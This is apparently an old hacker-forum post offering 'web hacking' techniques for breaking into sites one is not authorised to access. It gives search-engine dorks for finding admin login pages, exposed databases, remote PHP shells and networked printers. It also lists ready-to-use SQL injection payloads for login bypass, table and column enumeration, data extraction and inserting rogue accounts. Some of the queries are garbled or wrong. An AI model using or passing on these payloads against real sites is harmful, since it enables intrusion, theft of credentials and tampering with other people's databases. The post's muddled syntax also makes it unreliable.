Web Hacking

This tells you how to hack websites NO hacking this one lol!

To start off web hackingis not so good if your just starting out with hacking it is hard and if you get pinged ... Using the 'operators' we can then find some good things: inurl:adminlogin.asp = this chucks up some admin webpages inurl:backup filetype:mdb = maybe a few old databases with logins lying around "index of cgi-bin" = the directory of cgi-bin ;) "phpMyAdmin" "running on" inurl:"main.php" = used to configure databases mainly databasetype. Code : 80004005. Error Description : = dbs for snitz forums intitle:"PHP Shell *" "Enable stderr" filetype:php = a remote php shell! intitle:"network administration" inurl:"nic" = A funny thing to take over networked printers New code************************************************** alright, i see alot of questions about SQL Injection going around mostly in the realistic misions section of the forums, i am going to write out some of the basic sql injection commands for getting into a place you arnt supose to be in wink.gif i will write the command how it is supose to be in the url bar (address bar) and how it should be in a text box (ex. a password prompt) (these methods should work in any browser) ***entering as first person on sql database*** --text box-- login: hi' or 1=1-- pass: hi'or 1=1-- --url bar--http://site/index.asp?id=hi' or 1=1-- %Note: you can replace the 1's with things like a's or 0's and such ***retreiving table names*** --text box-- UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- --url bar-- UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- http://site/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- ***to retreive column names*** --text box-- UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tablename'-- %Note replace the '"tablename text with what the tables name is!!! --url bar--http://site/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tablename'-- ***retreive getting data from table*** --text box-- UNION SELECT TOP 1 table_name FROM column_name-- %Note: replace table_name with the name of the table and column name with the name of the column!!!! --url bar--http://site/index.asp?id=10 UNION SELECT TOP 1 table_name FROM column_name-- ***Inserting data into a databse!*** INSERT INTO 'table_name'('login_id','login_name','password') VALUES (111,name,pass)-- %Note: replace login_id,Login_name, and password with the names of the columns, replace table_name with the name of the table and the values 111,name,pass to what you want , corresponds in order of colums! --url bar--http://site/index.asp?id=10 INSERT INTO 'table_name'('login_id','login_name','password') VALUES (111,name,pass)-- well i hope thats enough!!! if there is a request for some more commands i will make a new topic as a continuation with those commands